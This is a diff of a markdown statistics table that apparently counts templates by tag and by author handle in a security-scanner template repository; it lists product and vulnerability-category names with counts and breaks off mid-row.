| | | -| odoo | 2 | tim_koopmans | 1 | | | | | | | -| azure | 2 | undefl0w | 1 | | | | | | | -| natshell | 2 | sshell | 1 | | | | | | | -| sitecore | 2 | luskabol | 1 | | | | | | | -| jeedom | 2 | me9187 | 1 | | | | | | | -| yapi | 2 | alph4byt3 | 1 | | | | | | | -| wuzhicms | 2 | brabbit10 | 1 | | | | | | | -| leak | 2 | patralos | 1 | | | | | | | -| rockmongo | 2 | kareemse1im | 1 | | | | | | | -| showdoc | 2 | mass0ma | 1 | | | | | | | -| seeyon | 2 | fopina | 1 | | | | | | | -| netsweeper | 2 | sickwell | 1 | | | | | | | -| flir | 2 | bjhulst | 1 | | | | | | | -| rstudio | 2 | luci | 1 | | | | | | | -| activemq | 2 | berkdusunur | 1 | | | | | | | -| nagios | 2 | geraldino2 | 1 | | | | | | | -| minio | 2 | ringo | 1 | | | | | | | -| trixbox | 2 | @dwisiswant0 | 1 | | | | | | | -| avantfax | 2 | b0rn2r00t | 1 | | | | | | | -| akkadian | 2 | _c0wb0y_ | 1 | | | | | | | -| frp | 2 | smaranchand | 1 | | | | | | | -| db | 2 | fmunozs | 1 | | | | | | | -| hashicorp | 2 | ratnadip gajbhiye | 1 | | | | | | | -| totemomail | 2 | s1r1u5_ | 1 | | | | | | | -| couchdb | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| axis2 | 2 | daviey | 1 | | | | | | | -| geowebserver | 2 | bad5ect0r | 1 | | | | | | | -| paloalto | 2 | x6263 | 1 | | | | | | | -| cve2005 | 2 | schniggie | 1 | | | | | | | -| jboss | 2 | 0xrod | 1 | | | | | | | -| dolibarr | 2 | mhdsamx | 1 | | | | | | | -| openfire | 2 | rojanrijal | 1 | | | | | | | -| hjtcloud | 2 | 0xteles | 1 | | | | | | | -| jsf | 2 | rotemreiss | 1 | | | | | | | -| shellshock | 2 | absshax | 1 | | | | | | | -| fortios | 2 | retr0 | 1 | | | | | | | -| ucmdb | 2 | co0nan | 1 | | | | | | | -| dos | 2 | exploitation | 1 | | | | | | | -| kong | 2 | toufik airane | 1 | | | | | | | -| middleware | 2 | naglinagli | 1 | | | | | | | -| spark | 2 | kabirsuda | 1 | | | | | | | -| horde | 2 | ahmed sherif | 1 | | | | | | | -| netis | 2 | whynotke | 1 | | | | | | | -| kentico | 2 | | | | | | | | | -| chamilo | 2 | | | | | | | | | +| xxljob | 2 | bolli95 | 1 | | | | | | | +| totemomail | 2 | apt-mirror | 1 | | | | | | | +| backdoor | 2 | kurohost | 1 | | | | | | | +| nagios | 2 | revblock | 1 | | | | | | | +| aruba | 2 | shelld3v | 1 | | | | | | | +| chamilo | 2 | _darrenmartyn | 1 | | | | | | | +| adminer | 2 | b0yd | 1 | | | | | | | +| paloalto | 2 | taielab | 1 | | | | | | | +| prtg | 2 | ohlinge | 1 | | | | | | | +| jeedom | 2 | aceseven (digisec360) | 1 | | | | | | | +| voipmonitor | 2 | luskabol | 1 | | | | | | | +| sonicwall | 2 | blckraven | 1 | | | | | | | +| storage | 2 | thevillagehacker | 1 | | | | | | | +| openfire | 2 | ivo palazzolo (@palaziv) | 1 | | | | | | | +| axis2 | 2 | andysvints | 1 | | | | | | | +| cache | 2 | its0x08 | 1 | | | | | | | +| sitecore | 2 | yavolo | 1 | | | | | | | +| splunk | 2 | berkdusunur | 1 | | | | | | | +| manageengine | 2 | smaranchand | 1 | | | | | | | +| cve2005 | 2 | sec_hawk | 1 | | | | | | | +| jboss | 2 | @dwisiswant0 | 1 | | | | | | | +| mida | 2 | streetofhackerr007 | 1 | | | | | | | +| guacamole | 2 | whynotke | 1 | | | | | | | +| avantfax | 2 | noamrathaus | 1 | | | | | | | +| akamai | 2 | aresx | 1 | | | | | | | +| qcubed | 2 | dawid-czarnecki | 1 | | | | | | | +| status | 2 | divya_mudgal | 1 | | | | | | | +| sonarqube | 2 | _c0wb0y_ | 1 | | | | | | | +| pega | 2 | th3.d1p4k | 1 | | | | | | | +| middleware | 2 | j33n1k4 | 1 | | | | | | | +| chiyu | 2 | manuelbua | 1 | | | | | | | +| kong | 2 | makyotox | 1 | | | | | | | +| emerge | 2 | 0xrod | 1 | | | | | | | +| oauth | 2 | ooooooo_q | 1 | | | | | | | +| sharepoint | 2 | rojanrijal | 1 | | | | | | | +| frp | 2 | zandros0 | 1 | | | | | | | +| ilo | 2 | yashgoti | 1 | | | | | | | +| liferay | 2 | patralos | 1 | | | | | | | +| globalprotect | 2 | willd96 | 1 | | | | | | | +| getsimple | 2 | sy3omda | 1 | | | | | | | +| showdoc | 2 | brabbit10 | 1 | | | | | | | +| phpcollab | 2 | petruknisme | 1 | | | | | | | +| hashicorp | 2 | evolutionsec | 1 | | | | | | | +| fortios | 2 | intx0x80 | 1 | | | | | | | +| grav | 2 | d0rkerdevil | 1 | | | | | | | +| harbor | 2 | mubassirpatel | 1 | | | | | | | +| hostheader-injection | 2 | vzamanillo | 1 | | | | | | | +| horde | 2 | affix | 1 | | | | | | | +| spark | 2 | bad5ect0r | 1 | | | | | | | +| hpe | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | +| axis | 2 | rotemreiss | 1 | | | | | | | +| github | 2 | ahmed sherif | 1 | | | | | | | +| prestashop | 2 | 0xtavian | 1 | | | | | | | +| igs | 2 | fopina | 1 | | | | | | | +| trixbox | 2 | mesaglio | 1 | | | | | | | +| glassfish | 2 | flag007 | 1 | | | | | | | +| maian | 2 | @github.com/defr0ggy | 1 | | | | | | | +| vrealize | 2 | shreyapohekar | 1 | | | | | | | +| rstudio | 2 | nerrorsec | 1 | | | | | | | +| flir | 2 | micha3lb3n | 1 | | | | | | | +| jsf | 2 | hanlaomo | 1 | | | | | | | +| odoo | 2 | j3ssie/geraldino2 | 1 | | | | | | | +| couchdb | 2 | juicypotato1 | 1 | | | | | | | +| ecology | 2 | pudsec | 1 | | | | | | | +| linux | 2 | daviey | 1 | | | | | | | +| mcafee | 2 | kre80r | 1 | | | | | | | +| bucket | 2 | naglinagli | 1 | | | | | | | +| activemq | 2 | ajaysenr | 1 | | | | | | | +| icewarp | 2 | adrianmf | 1 | | | | | | | +| idrac | 2 | chron0x | 1 | | | | | | | +| azure | 2 | defr0ggy | 1 | | | | | | | +| wordfence | 2 | thezakman | 1 | | | | | | | +| waf | 2 | exploitation | 1 | | | | | | | +| cve2007 | 2 | hakluke | 1 | | | | | | | +| minio | 2 | cookiehanhoan | 1 | | | | | | | +| rockmongo | 2 | xstp | 1 | | | | | | | +| plesk | 2 | philippdelteil | 1 | | | | | | | +| hjtcloud | 2 | mah3sec_ | 1 | | | | | | | +| smb | 2 | jteles | 1 | | | | | | | +| keycloak | 2 | x6263 | 1 | | | | | | | +| dolibarr | 2 | b0rn2r00t | 1 | | | | | | | +| saltstack | 2 | rodnt | 1 | | | | | | | +| huawei | 2 | deena | 1 | | | | | | | +| ec2 | 2 | retr0 | 1 | | | | | | | +| dos | 2 | gboddin | 1 | | | | | | | +| node | 2 | akshansh | 1 | | | | | | | +| wuzhicms | 2 | s1r1u5_ | 1 | | | | | | | +| netis | 2 | yashanand155 | 1 | | | | | | | +| db | 2 | twitter.com/dheerajmadhukar | 1 | | | | | | | +| nextcloud | 2 | sickwell | 1 | | | | | | | +| webcam | 2 | wabafet | 1 | | | | | | | +| service | 2 | 0h1in9e | 1 | | | | | | | +| hasura | 2 | akash.c | 1 | | | | | | | +| yapi | 2 | luci | 1 | | | | | | | +| akkadian | 2 | kareemse1im | 1 | | | | | | | +| seeyon | 2 | | | | | | | | | +| bruteforce | 2 | | | | | | | | | +| geowebserver | 2 | | | | | | | | | +| natshell | 2 | | | | | | | | | +| yii | 2 | | | | | | | | | +| ucmdb | 2 | | | | | | | | | +| nextjs | 2 | | | | | | | | | | favicon | 2 | | | | | | | | | -| guacamole | 2 | | | | | | | | | -| prestashop | 2 | | | | | | | | | -| getsimple | 2 | | | | | | | | | -| prtg | 2 | | | | | | | | | -| linux | 2 | | | | | | | | | -| status | 2 | | | | | | | | | -| azkaban | 1 | | | | | | | | | -| alibaba | 1 | | | | | | | | | -| tracer | 1 | | | | | | | | | -| rabbitmq | 1 | | | | | | | | | -| calendarix | 1 | | | | | | | | | -| avalanche | 1 | | | | | | | | | -| minimouse | 1 | | | | | | | | | -| ewebs | 1 | | | | | | | | | -| default-login | 1 | | | | | | | | | -| turbocrm | 1 | | | | | | | | | -| interlib | 1 | | | | | | | | | -| monitorix | 1 | | | | | | | | | -| alerta | 1 | | | | | | | | | -| omi | 1 | | | | | | | | | -| commscope | 1 | | | | | | | | | -| fortigates | 1 | | | | | | | | | -| enumeration | 1 | | | | | | | | | -| wifisky | 1 | | | | | | | | | -| rmi | 1 | | | | | | | | | -| cve2006 | 1 | | | | | | | | | -| actuator | 1 | | | | | | | | | -| lotus | 1 | | | | | | | | | -| meraki | 1 | | | | | | | | | -| jmx | 1 | | | | | | | | | -| phpinfo | 1 | | | | | | | | | -| robomongo | 1 | | | | | | | | | -| razor | 1 | | | | | | | | | -| chinaunicom | 1 | | | | | | | | | -| mantisbt | 1 | | | | | | | | | -| embedthis | 1 | | | | | | | | | -| zookeeper | 1 | | | | | | | | | -| myucms | 1 | | | | | | | | | -| rujjie | 1 | | | | | | | | | -| selea | 1 | | | | | | | | | -| openerp | 1 | | | | | | | | | -| comodo | 1 | | | | | | | | | -| st | 1 | | | | | | | | | -| appweb | 1 | | | | | | | | | -| kerbynet | 1 | | | | | | | | | -| viewpoint | 1 | | | | | | | | | -| thinkadmin | 1 | | | | | | | | | -| openrestry | 1 | | | | | | | | | -| shoretel | 1 | | | | | | | | | -| visionhub | 1 | | | | | | | | | -| svn | 1 | | | | | | | | | -| webadmin | 1 | | | | | | | | | -| portainer | 1 | | | | | | | | | -| dnssec | 1 | | | | | | | | | -| servicedesk | 1 | | | | | | | | | -| tjws | 1 | | | | | | | | | -| wamp | 1 | | | | | | | | | -| node-red-dashboard | 1 | | | | | | | | | -| clickhouse | 1 | | | | | | | | | -| xiuno | 1 | | | | | | | | | -| centreon | 1 | | | | | | | | | -| openx | 1 | | | | | | | | | -| scs | 1 | | | | | | | | | -| javamelody | 1 | | | | | | | | | -| webui | 1 | | | | | | | | | -| smartsense | 1 | | | | | | | | | -| vscode | 1 | | | | | | | | | -| nps | 1 | | | | | | | | | -| cors | 1 | | | | | | | | | -| lighttpd | 1 | | | | | | | | | -| fortinet | 1 | | | | | | | | | -| acexy | 1 | | | | | | | | | -| geddy | 1 | | | | | | | | | -| tongda | 1 | | | | | | | | | -| panos | 1 | | | | | | | | | -| owasp | 1 | | | | | | | | | -| monitorr | 1 | | | | | | | | | -| codemeter | 1 | | | | | | | | | -| clink-office | 1 | | | | | | | | | -| majordomo2 | 1 | | | | | | | | | -| phalcon | 1 | | | | | | | | | -| hadoop | 1 | | | | | | | | | -| ems | 1 | | | | | | | | | -| bookstack | 1 | | | | | | | | | -| gilacms | 1 | | | | | | | | | -| cocoon | 1 | | | | | | | | | -| lansweeper | 1 | | | | | | | | | -| oscommerce | 1 | | | | | | | | | -| visualtools | 1 | | | | | | | | | -| enum | 1 | | | | | | | | | -| mongo | 1 | | | | | | | | | -| ganglia | 1 | | | | | | | | | -| mysql | 1 | | | | | | | | | -| pippoint | 1 | | | | | | | | | -| achecker | 1 | | | | | | | | | -| panabit | 1 | | | | | | | | | -| timeclock | 1 | | | | | | | | | -| klog | 1 | | | | | | | | | -| camunda | 1 | | | | | | | | | -| jsp | 1 | | | | | | | | | -| xff | 1 | | | | | | | | | -| mrtg | 1 | | | | | | | | | -| apiman | 1 | | | | | | | | | -| feifeicms | 1 | | | | | | | | | -| lancom | 1 | | | | | | | | | -| expn | 1 | | | | | | | | | -| sql | 1 | | | | | | | | | -| wondercms | 1 | | | | | | | | | -| gitea | 1 | | | | | | | | | -| daybyday | 1 | | | | | | | | | -| shopware | 1 | | | | | | | | | -| phpwiki | 1 | | | | | | | | | -| phpunit | 1 | | | | | | | | | -| resourcespace | 1 | | | | | | | | | -| ecom | 1 | | | | | | | | | -| arl | 1 | | | | | | | | | -| wiki | 1 | | | | | | | | | -| ns | 1 | | | | | | | | | -| ambari | 1 | | | | | | | | | -| vsphere | 1 | | | | | | | | | -| opentsdb | 1 | | | | | | | | | -| eyelock | 1 | | | | | | | | | -| ognl | 1 | | | | | | | | | -| ioncube | 1 | | | | | | | | | -| netdata | 1 | | | | | | | | | -| api-manager | 1 | | | | | | | | | -| wmt | 1 | | | | | | | | | -| octoprint | 1 | | | | | | | | | -| timesheet | 1 | | | | | | | | | -| myvuehelp | 1 | | | | | | | | | -| tpshop | 1 | | | | | | | | | -| addpac | 1 | | | | | | | | | -| aura | 1 | | | | | | | | | -| sceditor | 1 | | | | | | | | | -| nifi | 1 | | | | | | | | | -| shiro | 1 | | | | | | | | | -| floc | 1 | | | | | | | | | -| auth | 1 | | | | | | | | | -| apos | 1 | | | | | | | | | -| aspnuke | 1 | | | | | | | | | -| empirecms | 1 | | | | | | | | | -| default | 1 | | | | | | | | | -| triconsole | 1 | | | | | | | | | -| payara | 1 | | | | | | | | | -| circontrol | 1 | | | | | | | | | -| phpfastcache | 1 | | | | | | | | | -| primetek | 1 | | | | | | | | | -| gsoap | 1 | | | | | | | | | -| upload | 1 | | | | | | | | | -| zzzcms | 1 | | | | | | | | | -| tor | 1 | | | | | | | | | -| bigbluebutton | 1 | | | | | | | | | -| clockwork | 1 | | | | | | | | | -| crm | 1 | | | | | | | | | -| graylog | 1 | | | | | | | | | -| setup | 1 | | | | | | | | | -| zend | 1 | | | | | | | | | -| dbeaver | 1 | | | | | | | | | -| openvpn | 1 | | | | | | | | | -| influxdb | 1 | | | | | | | | | -| pyramid | 1 | | | | | | | | | -| elascticsearch | 1 | | | | | | | | | -| tidb | 1 | | | | | | | | | -| eyou | 1 | | | | | | | | | -| natemail | 1 | | | | | | | | | -| traefik | 1 | | | | | | | | | -| cse | 1 | | | | | | | | | -| heroku | 1 | | | | | | | | | -| labtech | 1 | | | | | | | | | -| adb | 1 | | | | | | | | | -| blue-ocean | 1 | | | | | | | | | -| ulterius | 1 | | | | | | | | | -| mariadb | 1 | | | | | | | | | -| szhe | 1 | | | | | | | | | -| sarg | 1 | | | | | | | | | -| whm | 1 | | | | | | | | | -| alertmanager | 1 | | | | | | | | | -| exposures | 1 | | | | | | | | | -| kubeflow | 1 | | | | | | | | | -| ilo4 | 1 | | | | | | | | | -| javascript | 1 | | | | | | | | | -| k8s | 1 | | | | | | | | | -| qsan | 1 | | | | | | | | | -| diris | 1 | | | | | | | | | -| landray | 1 | | | | | | | | | -| dom | 1 | | | | | | | | | -| tensorboard | 1 | | | | | | | | | -| elfinder | 1 | | | | | | | | | -| stem | 1 | | | | | | | | | -| episerver | 1 | | | | | | | | | -| ghost | 1 | | | | | | | | | -| zarafa | 1 | | | | | | | | | -| openemr | 1 | | | | | | | | | -| bash | 1 | | | | | | | | | -| biometrics | 1 | | | | | | | | | -| xdcms | 1 | | | | | | | | | -| nsasg | 1 | | | | | | | | | -| mobileiron | 1 | | | | | | | | | -| websphere | 1 | | | | | | | | | -| discourse | 1 | | | | | | | | | -| xunchi | 1 | | | | | | | | | -| viewlinc | 1 | | | | | | | | | -| vnc | 1 | | | | | | | | | -| rdp | 1 | | | | | | | | | -| acontent | 1 | | | | | | | | | -| landrayoa | 1 | | | | | | | | | -| fastapi | 1 | | | | | | | | | -| servicenow | 1 | | | | | | | | | -| netrc | 1 | | | | | | | | | -| powercreator | 1 | | | | | | | | | -| processmaker | 1 | | | | | | | | | -| darkstat | 1 | | | | | | | | | -| svnserve | 1 | | | | | | | | | -| mediumish | 1 | | | | | | | | | -| yealink | 1 | | | | | | | | | -| dotnetnuke | 1 | | | | | | | | | -| tieline | 1 | | | | | | | | | -| octobercms | 1 | | | | | | | | | -| artica | 1 | | | | | | | | | -| nuxeo | 1 | | | | | | | | | -| tileserver | 1 | | | | | | | | | -| clockwatch | 1 | | | | | | | | | -| beanshell | 1 | | | | | | | | | -| b2evolution | 1 | | | | | | | | | -| simplecrm | 1 | | | | | | | | | -| pcoip | 1 | | | | | | | | | -| chyrp | 1 | | | | | | | | | -| keenetic | 1 | | | | | | | | | -| gespage | 1 | | | | | | | | | -| tenda | 1 | | | | | | | | | -| spf | 1 | | | | | | | | | -| circontrorl | 1 | | | | | | | | | -| spidercontrol | 1 | | | | | | | | | -| zms | 1 | | | | | | | | | -| linkedin | 1 | | | | | | | | | -| pihole | 1 | | | | | | | | | -| grails | 1 | | | | | | | | | -| totaljs | 1 | | | | | | | | | -| zte | 1 | | | | | | | | | -| smi | 1 | | | | | | | | | -| shopizer | 1 | | | | | | | | | -| dotnet | 1 | | | | | | | | | -| s3 | 1 | | | | | | | | | -| pacsone | 1 | | | | | | | | | -| varnish | 1 | | | | | | | | | -| lg-nas | 1 | | | | | | | | | -| lotuscms | 1 | | | | | | | | | -| proftpd | 1 | | | | | | | | | -| database | 1 | | | | | | | | | -| xml | 1 | | | | | | | | | -| graphql | 1 | | | | | | | | | -| solman | 1 | | | | | | | | | -| emby | 1 | | | | | | | | | -| yachtcontrol | 1 | | | | | | | | | -| netmask | 1 | | | | | | | | | -| flink | 1 | | | | | | | | | -| exacqvision | 1 | | | | | | | | | -| exponentcms | 1 | | | | | | | | | -| bolt | 1 | | | | | | | | | -| hiboss | 1 | | | | | | | | | -| checkpoint | 1 | | | | | | | | | -| ueditor | 1 | | | | | | | | | -| csod | 1 | | | | | | | | | -| gateone | 1 | | | | | | | | | -| tika | 1 | | | | | | | | | -| postmessage | 1 | | | | | | | | | -| twitter-server | 1 | | | | | | | | | -| uwsgi | 1 | | | | | | | | | -| opensns | 1 | | | | | | | | | -| lanproxy | 1 | | | | | | | | | -| zeroshell | 1 | | | | | | | | | -| zm | 1 | | | | | | | | | -| pulsesecure | 1 | | | | | | | | | -| wavlink | 1 | | | | | | | | | -| webmodule-ee | 1 | | | | | | | | | -| xampp | 1 | | | | | | | | | -| ecoa | 1 | | | | | | | | | -| frontpage | 1 | | | | | | | | | -| idemia | 1 | | | | | | | | | -| cloudflare | 1 | | | | | | | | | -| gunicorn | 1 | | | | | | | | | -| logontracer | 1 | | | | | | | | | +| netsweeper | 2 | | | | | | | | | +| bedita | 1 | | | | | | | | | | jeewms | 1 | | | | | | | | | -| h3c-imc | 1 | | | | | | | | | -| zcms | 1 | | | | | | | | | -| gloo | 1 | | | | | | | | | -| webftp | 1 | | | | | | | | | -| subrion | 1 | | | | | | | | | -| gitlist | 1 | | | | | | | | | -| accela | 1 | | | | | | | | | -| nimble | 1 | | | | | | | | | -| starttls | 1 | | | | | | | | | -| maccmsv10 | 1 | | | | | | | | | -| skywalking | 1 | | | | | | | | | -| ruckus | 1 | | | | | | | | | -| kindeditor | 1 | | | | | | | | | -| expose | 1 | | | | | | | | | -| sco | 1 | | | | | | | | | -| asus | 1 | | | | | | | | | -| mirai | 1 | | | | | | | | | -| kyan | 1 | | | | | | | | | -| rockethchat | 1 | | | | | | | | | -| sophos | 1 | | | | | | | | | -| opensmtpd | 1 | | | | | | | | | -| iceflow | 1 | | | | | | | | | -| iptime | 1 | | | | | | | | | -| ruby | 1 | | | | | | | | | -| centos | 1 | | | | | | | | | -| moin | 1 | | | | | | | | | -| redhat | 1 | | | | | | | | | -| etouch | 1 | | | | | | | | | -| salesforce | 1 | | | | | | | | | -| zmanda | 1 | | | | | | | | | -| rocketchat | 1 | | | | | | | | | -| zyxel | 1 | | | | | | | | | -| krweb | 1 | | | | | | | | | -| 74cms | 1 | | | | | | | | | -| owa | 1 | | | | | | | | | -| rsyncd | 1 | | | | | | | | | -| cockpit | 1 | | | | | | | | | -| wildfly | 1 | | | | | | | | | -| tectuus | 1 | | | | | | | | | -| csrf | 1 | | | | | | | | | -| clusterengine | 1 | | | | | | | | | -| bullwark | 1 | | | | | | | | | -| nweb2fax | 1 | | | | | | | | | -| sidekiq | 1 | | | | | | | | | -| domxss | 1 | | | | | | | | | -| fedora | 1 | | | | | | | | | -| sar2html | 1 | | | | | | | | | -| postgres | 1 | | | | | | | | | -| mara | 1 | | | | | | | | | -| cofax | 1 | | | | | | | | | -| opm | 1 | | | | | | | | | -| metabase | 1 | | | | | | | | | -| jfrog | 1 | | | | | | | | | -| huijietong | 1 | | | | | | | | | -| concrete | 1 | | | | | | | | | +| mobileiron | 1 | | | | | | | | | +| primetek | 1 | | | | | | | | | +| beanstalk | 1 | | | | | | | | | +| smartsense | 1 | | | | | | | | | +| aura | 1 | | | | | | | | | +| exposures | 1 | | | | | | | | | | luftguitar | 1 | | | | | | | | | -| wazuh | 1 | | | | | | | | | -| werkzeug | 1 | | | | | | | | | -| zenario | 1 | | | | | | | | | -| dvr | 1 | | | | | | | | | -| livezilla | 1 | | | | | | | | | +| linksys | 1 | | | | | | | | | +| episerver | 1 | | | | | | | | | +| cse | 1 | | | | | | | | | +| xml | 1 | | | | | | | | | +| triconsole | 1 | | | | | | | | | +| nimble | 1 | | | | | | | | | +| domxss | 1 | | | | | | | | | +| froxlor | 1 | | | | | | | | | +| socomec | 1 | | | | | | | | | +| k8s | 1 | | | | | | | | | +| perl | 1 | | | | | | | | | +| cobub | 1 | | | | | | | | | +| enumeration | 1 | | | | | | | | | +| trilithic | 1 | | | | | | | | | +| oidc | 1 | | | | | | | | | +| sprintful | 1 | | | | | | | | | +| expressjs | 1 | | | | | | | | | +| mongoshake | 1 | | | | | | | | | +| panos | 1 | | | | | | | | | +| influxdb | 1 | | | | | | | | | +| acontent | 1 | | | | | | | | | +| olivetti | 1 | | | | | | | | | +| stem | 1 | | | | | | | | | +| cyberoam | 1 | | | | | | | | | +| glances | 1 | | | | | | | | | +| feifeicms | 1 | | | | | | | | | +| owa | 1 | | | | | | | | | | wing-ftp | 1 | | | | | | | | | -| plone | 1 | | | | | | | | | -| nordex | 1 | | | | | | | | | -| k8 | 1 | | | | | | | | | -| gstorage | 1 | | | | | | | | | +| dompdf | 1 | | | | | | | | | +| geutebruck | 1 | | | | | | | | | +| zms | 1 | | | | | | | | | +| phpinfo | 1 | | | | | | | | | +| whm | 1 | | | | | | | | | +| ems | 1 | | | | | | | | | +| csrf | 1 | | | | | | | | | +| shopizer | 1 | | | | | | | | | +| viewpoint | 1 | | | | | | | | | +| chevereto | 1 | | | | | | | | | +| openx | 1 | | | | | | | | | +| servicedesk | 1 | | | | | | | | | +| extractor | 1 | | | | | | | | | +| mdb | 1 | | | | | | | | | +| vsphere | 1 | | | | | | | | | +| maccmsv10 | 1 | | | | | | | | | +| phalcon | 1 | | | | | | | | | +| mysql | 1 | | | | | | | | | +| default | 1 | | | | | | | | | +| werkzeug | 1 | | | | | | | | | | nette | 1 | | | | | | | | | -| glowroot | 1 | | | | | | | | | -| magicflow | 1 | | | | | | | | | -| eprints | 1 | | | | | | | | | -| scimono | 1 | | | | | | | | | -| metinfo | 1 | | | | | | | | | +| fastapi | 1 | | | | | | | | | +| mautic | 1 | | | | | | | | | +| rdp | 1 | | | | | | | | | +| spectracom | 1 | | | | | | | | | +| sage | 1 | | | | | | | | | +| shiro | 1 | | | | | | | | | +| rmc | 1 | | | | | | | | | +| zyxel | 1 | | | | | | | | | +| goahead | 1 | | | | | | | | | +| idemia | 1 | | | | | | | | | +| geddy | 1 | | | | | | | | | +| k8 | 1 | | | | | | | | | +| jsp | 1 | | | | | | | | | +| pihole | 1 | | | | | | | | | +| elascticsearch | 1 | | | | | | | | | +| powercreator | 1 | | | | | | | | | +| mirai | 1 | | | | | | | | | +| clink-office | 1 | | | | | | | | | +| vidyo | 1 | | | | | | | | | +| shoppable | 1 | | | | | | | | | +| starttls | 1 | | | | | | | | | +| dnssec | 1 | | | | | | | | | +| mediumish | 1 | | | | | | | | | +| auth | 1 | | | | | | | | | +| acexy | 1 | | | | | | | | | +| ganglia | 1 | | | | | | | | | +| mpsec | 1 | | | | | | | | | +| miscrsoft | 1 | | | | | | | | | +| commax | 1 | | | | | | | | | +| sceditor | 1 | | | | | | | | | +| traefik | 1 | | | | | | | | | +| openvpn | 1 | | | | | | | | | +| ntopng | 1 | | | | | | | | | +| sgp | 1 | | | | | | | | | +| rockethchat | 1 | | | | | | | | | +| plc | 1 | | | | | | | | | +| krweb | 1 | | | | | | | | | +| spip | 1 | | | | | | | | | +| webui | 1 | | | | | | | | | +| natemail | 1 | | | | | | | | | +| fedora | 1 | | | | | | | | | +| cocoon | 1 | | | | | | | | | +| webmin | 1 | | | | | | | | | +| duomicms | 1 | | | | | | | | | | hortonworks | 1 | | | | | | | | | +| discord | 1 | | | | | | | | | +| appweb | 1 | | | | | | | | | +| avalanche | 1 | | | | | | | | | +| xunchi | 1 | | | | | | | | | +| realteo | 1 | | | | | | | | | +| svn | 1 | | | | | | | | | +| bookstack | 1 | | | | | | | | | +| mongo | 1 | | | | | | | | | +| pulsesecure | 1 | | | | | | | | | +| zarafa | 1 | | | | | | | | | +| keenetic | 1 | | | | | | | | | +| timesheet | 1 | | | | | | | | | +| alibaba | 1 | | | | | | | | | +| tensorflow | 1 | | | | | | | | | +| flink | 1 | | | | | | | | | +| jmx | 1 | | | | | | | | | +| codeigniter | 1 | | | | | | | | | +| uwsgi | 1 | | | | | | | | | +| floc | 1 | | | | | | | | | +| eprints | 1 | | | | | | | | | +| ognl | 1 | | | | | | | | | +| selea | 1 | | | | | | | | | +| rsyncd | 1 | | | | | | | | | +| gespage | 1 | | | | | | | | | +| fortigates | 1 | | | | | | | | | +| wavemaker | 1 | | | | | | | | | +| ulterius | 1 | | | | | | | | | +| pmb | 1 | | | | | | | | | +| springframework | 1 | | | | | | | | | +| exponentcms | 1 | | | | | | | | | +| qsan | 1 | | | | | | | | | +| mariadb | 1 | | | | | | | | | +| lighttpd | 1 | | | | | | | | | +| hiboss | 1 | | | | | | | | | +| esmtp | 1 | | | | | | | | | +| bash | 1 | | | | | | | | | +| lotus | 1 | | | | | | | | | +| rhymix | 1 | | | | | | | | | +| calendarix | 1 | | | | | | | | | +| graphite | 1 | | | | | | | | | +| eg | 1 | | | | | | | | | +| ricoh | 1 | | | | | | | | | +| dvwa | 1 | | | | | | | | | +| blue-ocean | 1 | | | | | | | | | +| sophos | 1 | | | | | | | | | +| sql | 1 | | | | | | | | | +| dvr | 1 | | | | | | | | | +| tika | 1 | | | | | | | | | +| ecom | 1 | | | | | | | | | +| varnish | 1 | | | | | | | | | +| shopware | 1 | | | | | | | | | +| daybyday | 1 | | | | | | | | | +| sureline | 1 | | | | | | | | | +| terraform | 1 | | | | | | | | | +| gunicorn | 1 | | | | | | | | | +| ghost | 1 | | | | | | | | | +| octobercms | 1 | | | | | | | | | +| nuuo | 1 | | | | | | | | | +| webftp | 1 | | | | | | | | | +| scs | 1 | | | | | | | | | +| alertmanager | 1 | | | | | | | | | +| servicenow | 1 | | | | | | | | | +| circontrol | 1 | | | | | | | | | +| metinfo | 1 | | | | | | | | | +| zend | 1 | | | | | | | | | +| office365 | 1 | | | | | | | | | +| rabbitmq | 1 | | | | | | | | | +| kubeflow | 1 | | | | | | | | | +| wazuh | 1 | | | | | | | | | +| javamelody | 1 | | | | | | | | | +| kyan | 1 | | | | | | | | | +| sidekiq | 1 | | | | | | | | | +| ruby | 1 | | | | | | | | | +| rubedo | 1 | | | | | | | | | +| swagger | 1 | | | | | | | | | +| glowroot | 1 | | | | | | | | | +| totaljs | 1 | | | | | | | | | +| gitea | 1 | | | | | | | | | +| mrtg | 1 | | | | | | | | | +| webmodule-ee | 1 | | | | | | | | | +| fuelcms | 1 | | | | | | | | | +| nordex | 1 | | | | | | | | | +| avtech | 1 | | | | | | | | | +| sentry | 1 | | | | | | | | | +| rujjie | 1 | | | | | | | | | +| interlib | 1 | | | | | | | | | +| expose | 1 | | | | | | | | | +| checkpoint | 1 | | | | | | | | | +| saltapi | 1 | | | | | | | | | +| cloudinary | 1 | | | | | | | | | +| zmanda | 1 | | | | | | | | | +| xff | 1 | | | | | | | | | +| svnserve | 1 | | | | | | | | | +| proftpd | 1 | | | | | | | | | +| gateone | 1 | | | | | | | | | +| owasp | 1 | | | | | | | | | +| jnoj | 1 | | | | | | | | | +| oneblog | 1 | | | | | | | | | +| gstorage | 1 | | | | | | | | | +| gitlist | 1 | | | | | | | | | +| fastcgi | 1 | | | | | | | | | +| ewebs | 1 | | | | | | | | | +| wmt | 1 | | | | | | | | | +| zm | 1 | | | | | | | | | +| websphere | 1 | | | | | | | | | +| openrestry | 1 | | | | | | | | | +| arl | 1 | | | | | | | | | +| seacms | 1 | | | | | | | | | +| lanproxy | 1 | | | | | | | | | +| dom | 1 | | | | | | | | | | mailchimp | 1 | | | | | | | | | +| s3 | 1 | | | | | | | | | +| jenzabar | 1 | | | | | | | | | +| spring | 1 | | | | | | | | | +| nc2 | 1 | | | | | | | | | +| pyramid | 1 | | | | | | | | | +| phpfusion | 1 | | | | | | | | | +| opensmtpd | 1 | | | | | | | | | +| netdata | 1 | | | | | | | | | +| lotuscms | 1 | | | | | | | | | +| vscode | 1 | | | | | | | | | +| opensns | 1 | | | | | | | | | +| default-login | 1 | | | | | | | | | +| redhat | 1 | | | | | | | | | +| zenario | 1 | | | | | | | | | +| zzzcms | 1 | | | | | | | | | +| kindeditor | 1 | | | | | | | | | +| commscope | 1 | | | | | | | | | +| rfi | 1 | | | | | | | | | +| rmi | 1 | | | | | | | | | +| bazarr | 1 | | | | | | | | | +| livezilla | 1 | | | | | | | | | +| ssltls | 1 | | | | | | | | | +| szhe | 1 | | | | | | | | | +| xiuno | 1 | | | | | | | | | +| ns | 1 | | | | | | | | | +| database | 1 | | | | | | | | | +| tieline | 1 | | | | | | | | | +| mantisbt | 1 | | | | | | | | | +| nsasg | 1 | | | | | | | | | +| sar2html | 1 | | | | | | | | | +| 